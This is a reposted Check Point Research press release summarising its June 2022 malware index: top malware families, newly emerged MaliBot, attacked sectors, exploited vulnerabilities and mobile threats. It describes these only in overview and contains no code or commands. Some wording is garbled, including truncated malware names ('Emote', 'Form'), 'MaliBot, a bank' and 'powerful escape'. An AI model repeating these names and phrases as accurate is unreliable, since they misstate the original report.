Most Wanted Malware of June 2022: New Banking, MaliBot,

0

SAN CARLOS, Calif., July 12. 2022 (GLOBE NEWSWIRE) — Check Point Research (CPR), the threat intelligence arm of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), one of the world’s leading cybersecurity solution providers, has released its latest Global Threat Index for June 2022. CPR reports that a new Android banking malware has emerged, named MaliBot, following the takedown of FluBot at the end of May. .

Although just discovered, MaliBot, a bank, has already reached the third place in the list of the most widespread mobile malware. It disguises itself as cryptocurrency mining apps under different names and targets mobile banking users to steal financial information. Similar to FluBot, MaliBot uses phishing (smishing) text messages to trick victims into clicking on a malicious link that redirects them to download a fake app containing the malware.

Also this month, the notorious malware, Emotet, is still the most prevalent malware overall. Snake Keylogger comes in at number three after an increase in activity from eighth place last month. The main functionality of Snake is to log user keystrokes and transmit collected data to threat actors. While in May CPR saw Snake Keylogger being delivered via PDF files, it has recently spread via emails containing Word attachments labeled as request for quotes. Researchers also reported a new variant of Emotet in June that has credit card theft capabilities and targets Chrome browser users.

“While it’s always good to see law enforcement succeed in bringing down cybercriminal groups or malware like FluBot, it unfortunately didn’t take long for a new mobile malware to take its place,” said Maya Horowitz, vice president of research at Check Point Software. “Cybercriminals are well aware of the central role mobile devices play in the lives of many people and are constantly adapting and improving their tactics accordingly. The threat landscape is rapidly changing and mobile malware poses a significant threat to personal and business security. Having a robust mobile threat prevention solution has never been more important.

CPR also revealed that “Apache Log4j Remote Code Execution” is the most commonly exploited vulnerability, affecting 43% of organizations worldwide, closely followed by “Web Server Exposed Git Repository Information Disclosure” which has an overall impact of 42. 3%. “Web Servers Malicious URL Directory Traversal” ranks third with an overall impact of 42.1%.

Top Malware Families

*The arrows refer to the change in ranking compared to the previous month.

This month, Emotet is still the most popular malware with an overall impact of 14%, followed by Formbook and Snake Keylogger, each affecting 4.4% of organizations worldwide.

  1. ↔ Emote – Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but recently it is used as a distributor for other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. Also, it can spread through phishing spam emails that contains malicious attachments or links.
  2. ↔ Form – Formbook is an Infostealer targeting the Windows operating system and was first detected in 2016. It is marketed as Malware-as-a-Service (MaaS) in underground hacking forums for its hacking techniques. powerful escape and its relatively low price. FormBook collects credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files based on commands from its C&C.
  3. ↑ Snake Keylogger – Snake is a modular .NET keylogger and credential stealer first spotted in late November 2020. Its main function is to log user keystrokes and transmit collected data to threat actors. Snake infections pose a major threat to users’ privacy and online security, as the malware can steal virtually any kind of sensitive information and is a particularly evasive and persistent keylogger.

The full list of the top ten malware families in June is available on Check Point’s blog.

Main sectors attacked in the world

This month, education/research is still the most attacked industry in the world, followed by government/military and healthcare.

  1. Education & Research
  2. Government/Military
  3. Health care

Main exploited vulnerabilities

This month, “Apache Log4j Remote Code Execution” is the most commonly exploited vulnerability, affecting 43% of organizations worldwide, closely followed by “Web Server Exposed Git Repository Information Disclosure” which has an overall impact of 42, 3%. “Web Servers Malicious URL Directory Traversal” ranks third with an overall impact of 42.1%.

  1. Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
  2. ↑ Disclosure of information about the Git repository exposed by the web server – An information disclosure vulnerability has been reported in the Git repository. Successful exploitation of this vulnerability could allow inadvertent disclosure of account information.
  3. Web server malicious URL directory traversal (CVE-2010-4598,CVE-2011-2474,CVE-2014-0130,CVE-2014-0780,CVE-2015-0666,CVE-2015-4068,CVE-2015 -7254,CVE-2016-4523,CVE-2016-8530,CVE-2017-11512,CVE-2018-3948,CVE-2018-3949,CVE-2019-18952,CVE-2020-5410,CVE-2020-8260 ) – A directory traversal vulnerability exists on various web servers. The vulnerability is caused due to an input validation error in a web server that does not properly sanitize the URL for directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.

Top Mobile Malware

This month AlienBot is the most prevalent mobile malware, followed by Anubis and MaliBot.

  1. AlienBot – The AlienBot malware family is Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker to first inject malicious code into legitimate financial apps. The attacker gains access to victims’ accounts and ultimately has complete control over their device.
  2. Anubis- Anubis is a banking Trojan designed for Android mobile phones. Since its initial detection, it has acquired additional features including Remote Access Trojan (RAT) functionality, keylogger, audio recording capabilities, and various ransomware features. It has been detected on hundreds of different apps available in the Google Store.
  3. MaliBot – Malibot is an Android Banking malware that has been spotted targeting users in Spain and Italy. The Banking disguises itself as crypto mining apps under different names and focuses on stealing financial information, crypto wallets and more personal data.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s ThreatCloud Intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors around the world across networks, devices and mobiles. Intelligence is enhanced with AI-powered engines and proprietary research data from Check Point Research, the intelligence and research arm of Check Point Software Technologies.

The full list of the top ten malware families in June is available on Check Point’s blog.

Follow Check Point Research via:
Blog: https://research.checkpoint.com/
Twitter: https://twitter.com/_cpresearch_

About Check Point Research
Check Point Research provides cutting-edge cyber threat intelligence to Check Point Software customers and the wider intelligence community. The research team collects and analyzes global cyberattack data stored on ThreatCloud to keep hackers at bay, while ensuring that all Check Point products are updated with the latest protections. The research team consists of over 100 analysts and researchers cooperating with other security vendors, law enforcement and various CERTs.

About Check Point Software Technologies Ltd.
Check Point Software Technologies Ltd. (checkpoint.com) is a leading provider of cybersecurity solutions for businesses and governments worldwide. Check Point Infinity’s portfolio of solutions protects businesses and public organizations against 5th generation cyberattacks with an industry-leading capture rate of malware, ransomware and other threats. Infinity comprises three main pillars delivering uncompromising security and Generation V threat prevention in enterprise environments: Check Point Harmony, for remote users; Check Point CloudGuard, to automatically secure clouds; and Check Point Quantum, to protect network perimeters and data centers, all controlled by the industry’s most comprehensive and intuitive unified security management. Check Point protects more than 100,000 organizations of all sizes.

Share.

About Author

Comments are closed.